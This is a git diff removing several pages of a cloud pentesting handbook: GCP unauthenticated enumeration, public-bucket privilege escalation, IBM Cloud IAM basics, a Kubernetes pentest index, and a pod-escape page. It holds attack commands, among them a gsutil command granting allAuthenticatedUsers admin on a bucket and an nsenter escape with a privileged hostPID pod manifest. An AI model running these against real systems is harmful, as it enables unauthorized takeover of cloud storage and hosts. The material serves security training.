- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md
deleted file mode 100644
index 1fa4e18a2..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md
+++ /dev/null
@@ -1,49 +0,0 @@
-# GCP - Cloud SQL Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud SQL - -For more infromation about Cloud SQL check: - -{% content-ref url="../gcp-services/gcp-cloud-sql-enum.md" %} -[gcp-cloud-sql-enum.md](../gcp-services/gcp-cloud-sql-enum.md) -{% endcontent-ref %} - -### Brute Force - -If you have **access to a Cloud SQL port** because all internet is permitted or for any other reason, you can try to brute force credentials. - -Check this page for **different tools to burte-force** different database technologies: - -{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force" %} - -Remember that with some privileges it's possible to **list all the database users** via GCP API. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md
deleted file mode 100644
index 200dd2333..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md
+++ /dev/null
@@ -1,49 +0,0 @@
-# GCP - Compute Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Compute - -For more information about Compute and VPC (Networking) check: - -{% content-ref url="../gcp-services/gcp-compute-instances-enum/" %} -[gcp-compute-instances-enum](../gcp-services/gcp-compute-instances-enum/) -{% endcontent-ref %} - -### SSRF - Server Side Request Forgery - -If a web is **vulnerable to SSRF** and it's possible to **add the metadata header**, an attacker could abuse it to access the SA OAuth token from the metadata endpoint. For more info about SSRF check: - -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery" %} - -### Vulnerable exposed services - -If a GCP instance has a vulnerable exposed service an attacker could abuse it to compromise it. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md
deleted file mode 100644
index 143207a71..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md
+++ /dev/null
@@ -1,46 +0,0 @@
-# GCP - Source Repositories Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Source Repositories - -For more information about Source Repositories check: - -{% content-ref url="../gcp-services/gcp-source-repositories-enum.md" %} -[gcp-source-repositories-enum.md](../gcp-services/gcp-source-repositories-enum.md) -{% endcontent-ref %} - -### Compromise External Repository - -If an external repository is being used via Source Repositories an attacker could add his malicious code to the repository and: - -* If someone uses Cloud Shell to develop the repository it could be compromised -* if this source repository is used by other GCP services, they could get compromised - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md deleted file mode 100644 index 39f682aa7..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md +++ /dev/null @@ -1,99 +0,0 @@ -# GCP - Storage Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Storage - -For more information about Storage check: - -{% content-ref url="../../gcp-services/gcp-storage-enum.md" %} -[gcp-storage-enum.md](../../gcp-services/gcp-storage-enum.md) -{% endcontent-ref %} - -### Public Bucket Brute Force - -The **format of an URL** to access a bucket is **`https://storage.googleapis.com/`.** - -The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names: - -* [https://github.com/RhinoSecurityLabs/GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute) - -**Also the tools** mentioned in: - -{% content-ref url="../" %} -[..](../) -{% endcontent-ref %} - -If you find that you can **access a bucket** you might be able to **escalate even further**, check: - -{% content-ref url="gcp-public-buckets-privilege-escalation.md" %} -[gcp-public-buckets-privilege-escalation.md](gcp-public-buckets-privilege-escalation.md) -{% endcontent-ref %} - -### Search Open Buckets in Current Account - -With the following script [gathered from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_buckets.sh) you can find all the open buckets: - -```bash -#!/bin/bash - -############################ -# Run this tool to find buckets that are open to the public anywhere -# in your GCP organization. -# -# Enjoy! -############################ - -for proj in $(gcloud projects list --format="get(projectId)"); do - echo "[*] scraping project $proj" - for bucket in $(gsutil ls -p $proj); do - echo " $bucket" - ACL="$(gsutil iam get $bucket)" - - all_users="$(echo $ACL | grep allUsers)" - all_auth="$(echo $ACL | grep allAuthenticatedUsers)" - - if [ -z "$all_users" ] - then - : - else - echo "[!] Open to all users: $bucket" - fi - - if [ -z "$all_auth" ] - then - : - else - echo "[!] 
Open to all authenticated users: $bucket" - fi - done -done -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md deleted file mode 100644 index bd3d71db2..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md +++ /dev/null @@ -1,57 +0,0 @@ -# GCP - Public Buckets Privilege Escalation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Buckets Privilege Escalation - -If the bucket policy allowed either “allUsers” or “allAuthenticatedUsers” to **write to their bucket policy** (the **storage.buckets.setIamPolicy** permission)**,** then anyone can modify the bucket policy and grant himself full access. - -### Check Permissions - -There are 2 ways to check the permissions over a bucket. The first one is to ask for them by making a request to `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam` or running `gsutil iam get gs://BUCKET_NAME`. - -However, if your user (potentially belonging to allUsers or allAuthenticatedUsers") doesn't have permissions to read the iam policy of the bucket (storage.buckets.getIamPolicy), that won't work. - -The other option which will always work is to use the testPermissions endpoint of the bucket to figure out if you have the specified permission, for example accessing: `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update` - -### Escalating - -In order to grant `Storage Admin` to `allAuthenticatedUsers` it's possible to run: - -```bash -gsutil iam ch allAuthenticatedUsers:admin gs://BUCKET_NAME -``` - -Another attack would be to **remove the bucket an d recreate it in your account to steal th ownership**. 
- -## References - -* [https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/](https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/ibm-cloud-pentesting/README.md b/pentesting-cloud/ibm-cloud-pentesting/README.md deleted file mode 100644 index caf2dee60..000000000 --- a/pentesting-cloud/ibm-cloud-pentesting/README.md +++ /dev/null @@ -1,62 +0,0 @@ -# IBM Cloud Pentesting - -## IBM Cloud Pentesting - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### What is IBM cloud? (By chatGPT) - -IBM Cloud, a cloud computing platform by IBM, offers a variety of cloud services such as infrastructure as a service (IaaS), platform as a service (PaaS), and software as a service (SaaS). It enables clients to deploy and manage applications, handle data storage and analysis, and operate virtual machines in the cloud. - -When compared with Amazon Web Services (AWS), IBM Cloud showcases certain distinct features and approaches: - -1. **Focus**: IBM Cloud primarily caters to enterprise clients, providing a suite of services designed for their specific needs, including enhanced security and compliance measures. In contrast, AWS presents a broad spectrum of cloud services for a diverse clientele. -2. **Hybrid Cloud Solutions**: Both IBM Cloud and AWS offer hybrid cloud services, allowing integration of on-premises infrastructure with their cloud services. However, the methodology and services provided by each differ. -3. **Artificial Intelligence and Machine Learning (AI & ML)**: IBM Cloud is particularly noted for its extensive and integrated services in AI and ML. AWS also offers AI and ML services, but IBM's solutions are considered more comprehensive and deeply embedded within its cloud platform. -4. **Industry-Specific Solutions**: IBM Cloud is recognized for its focus on particular industries like financial services, healthcare, and government, offering bespoke solutions. AWS caters to a wide array of industries but might not have the same depth in industry-specific solutions as IBM Cloud. 
- -#### Basic Information - -For some basic information about IAM and hierarchi check: - -{% content-ref url="ibm-basic-information.md" %} -[ibm-basic-information.md](ibm-basic-information.md) -{% endcontent-ref %} - -### SSRF - -Learn how you can access the medata endpoint of IBM in the following page: - -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#2af0" %} - -## References - -* [https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/#:\~:text=IBM%20Cloud%20is%3A,%2C%20networking%2C%20and%20database%20management.](https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md b/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md deleted file mode 100644 index 034d4fa02..000000000 --- a/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md +++ /dev/null @@ -1,99 +0,0 @@ -# IBM - Basic Information - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Hierarchy - -IBM Cloud resource model ([from the docs](https://www.ibm.com/blog/announcement/introducing-ibm-cloud-enterprises/)): - -
- -Recommended way to divide projects: - -
- -## IAM - -
- -### Users - -Users have an **email** assigned to them. They can access the **IBM console** and also **generate API keys** to use their permissions programatically.\ -**Permissions** can be granted **directly** to the user with an access policy or via an **access group**. - -### Trusted Profiles - -These are **like the Roles of AWS** or service accounts from GCP. It's possible to **assign them to VM** instances and access their **credentials via metadata**, or even **allow Identity Providers** to use them in order to authenticate users from external platforms.\ -**Permissions** can be granted **directly** to the trusted profile with an access policy or via an **access group**. - -### Service IDs - -This is another option to allow applications to **interact with IBM cloud** and perform actions. In this case, instead of assign it to a VM or Identity Provider an **API Key can be used** to interact with IBM in a **programatic** way.\ -**Permissions** can be granted **directly** to the service id with an access policy or via an **access group**. - -### Identity Providers - -External **Identity Providers** can be configured to **access IBM cloud** resources from external platforms by accessing **trusting Trusted Profiles**. - -### Access Groups - -In the same access group **several users, trusted profiles & service ids** can be present. Each principal in the access group will **inherit the access group permissions**.\ -**Permissions** can be granted **directly** to the trusted profile with an access policy.\ -An **access group cannot be a member** of another access group. - -### Roles - -A role is a **set of granular permissions**. **A role** is dedicated to **a service**, meaning that it will only contain permissions of that service.\ -**Each service** of IAM will already have some **possible roles** to choose from to **grant a principal access to that service**: **Viewer, Operator, Editor, Administrator** (although there could be more). 
- -Role permissions are given via access policies to principals, so if you need to give for example a **combination of permissions** of a service of **Viewer** and **Administrator**, instead of giving those 2 (and overprivilege a principal), you can **create a new role** for the service and give that new role the **granular permissions you need**. - -### Access Policies - -Access policies allows to **attach 1 or more roles of 1 service to 1 principal**.\ -When creating the policy you need to choose: - -* The **service** where permissions will be granted -* **Affected resources** -* Service & Platform **access** that will be granted - * These indicate the **permissions** that will be given to the principal to perform actions. If any **custom role** is created in the service you will also be able to choose it here. -* **Conditions** (if any) to grant the permissions - -{% hint style="info" %} -To grant access to several services to a user, you can generate several access policies -{% endhint %} - -
- -## References - -* [https://www.ibm.com/cloud/blog/announcements/introducing-ibm-cloud-enterprises](https://www.ibm.com/cloud/blog/announcements/introducing-ibm-cloud-enterprises) -* [https://cloud.ibm.com/docs/account?topic=account-iamoverview](https://cloud.ibm.com/docs/account?topic=account-iamoverview) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/kubernetes-security/README.md b/pentesting-cloud/kubernetes-security/README.md deleted file mode 100644 index c7b6d358f..000000000 --- a/pentesting-cloud/kubernetes-security/README.md +++ /dev/null @@ -1,106 +0,0 @@ -# Kubernetes Pentesting - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Kubernetes Basics - -If you don't know anything about Kubernetes this is a **good start**. Read it to learn about the **architecture, components and basic actions** in Kubernetes: - -{% content-ref url="kubernetes-basics.md" %} -[kubernetes-basics.md](kubernetes-basics.md) -{% endcontent-ref %} - -### Labs to practice and learn - -* [https://securekubernetes.com/](https://securekubernetes.com) -* [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html) - -## Hardening Kubernetes / Automatic Tools - -{% content-ref url="kubernetes-hardening/" %} -[kubernetes-hardening](kubernetes-hardening/) -{% endcontent-ref %} - -## Manual Kubernetes Pentest - -### From the Outside - -There are several possible **Kubernetes services that you could find exposed** on the Internet (or inside internal networks). If you find them you know there is Kubernetes environment in there. - -Depending on the configuration and your privileges you might be able to abuse that environment, for more information: - -{% content-ref url="pentesting-kubernetes-services/" %} -[pentesting-kubernetes-services](pentesting-kubernetes-services/) -{% endcontent-ref %} - -### Enumeration inside a Pod - -If you manage to **compromise a Pod** read the following page to learn how to enumerate and try to **escalate privileges/escape**: - -{% content-ref url="attacking-kubernetes-from-inside-a-pod.md" %} -[attacking-kubernetes-from-inside-a-pod.md](attacking-kubernetes-from-inside-a-pod.md) -{% endcontent-ref %} - -### Enumerating Kubernetes with Credentials - -You might have managed to compromise **user credentials, a user token or some service account toke**n. 
You can use it to talk to the Kubernetes API service and try to **enumerate it to learn more** about it: - -{% content-ref url="kubernetes-enumeration.md" %} -[kubernetes-enumeration.md](kubernetes-enumeration.md) -{% endcontent-ref %} - -Another important details about enumeration and Kubernetes permissions abuse is the **Kubernetes Role-Based Access Control (RBAC)**. If you want to abuse permissions, you first should read about it here: - -{% content-ref url="kubernetes-role-based-access-control-rbac.md" %} -[kubernetes-role-based-access-control-rbac.md](kubernetes-role-based-access-control-rbac.md) -{% endcontent-ref %} - -#### Knowing about RBAC and having enumerated the environment you can now try to abuse the permissions with: - -{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - -### Privesc to a different Namespace - -If you have compromised a namespace you can potentially escape to other namespaces with more interesting permissions/resources: - -{% content-ref url="kubernetes-namespace-escalation.md" %} -[kubernetes-namespace-escalation.md](kubernetes-namespace-escalation.md) -{% endcontent-ref %} - -### From Kubernetes to the Cloud - -If you have compromised a K8s account or a pod, you might be able able to move to other clouds. This is because in clouds like AWS or GCP is possible to **give a K8s SA permissions over the cloud**. - -{% content-ref url="kubernetes-pivoting-to-clouds.md" %} -[kubernetes-pivoting-to-clouds.md](kubernetes-pivoting-to-clouds.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md b/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md deleted file mode 100644 index f913d5ccf..000000000 --- a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md +++ /dev/null @@ -1,63 +0,0 @@ -# Pod Escape Privileges - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Privileged and hostPID - -With these privileges you will have **access to the hosts processes** and **enough privileges to enter inside the namespace of one of the host processes**.\ -Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp). - -Just executing something like the following will allow you to escape from the pod: - -```bash -nsenter --target 1 --mount --uts --ipc --net --pid -- bash -``` - -Configuration example: - -```yaml -apiVersion: v1 -kind: Pod -metadata: - name: priv-and-hostpid-exec-pod - labels: - app: pentest -spec: - hostPID: true - containers: - - name: priv-and-hostpid-pod - image: ubuntu - tty: true - securityContext: - privileged: true - command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] - #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
